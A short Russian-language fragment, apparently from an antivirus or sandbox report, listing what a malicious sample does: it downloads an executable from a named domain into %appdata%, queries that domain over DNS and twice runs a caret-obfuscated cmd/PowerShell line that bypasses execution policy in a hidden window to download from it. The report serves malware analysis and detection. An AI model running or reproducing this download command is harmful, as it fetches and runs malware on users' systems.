Техническая информация
- http://mysincshares.top/docsups.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owErshelL^.e^xE -^exE^c^ut^i^o^N^p^Ol^iCY bY^Pass^ ^-NoproFI^l^E -^win^doWStYl^e HId^den (NeW-O^b^jeC^T sy^Stem^.Ne^t.WEB^CL^ienT)^.D^owNloadfIL^e(^'http://mysincshares.top...
- DNS ASK my####shares.top
- '<SYSTEM32>\cmd.exe' /C "p^owErshelL^.e^xE -^exE^c^ut^i^o^N^p^Ol^iCY bY^Pass^ ^-NoproFI^l^E -^win^doWStYl^e HId^den (NeW-O^b^jeC^T sy^Stem^.Ne^t.WEB^CL^ienT)^.D^owNloadfIL^e(^'http://mysincshares.top...' (со скрытым окном)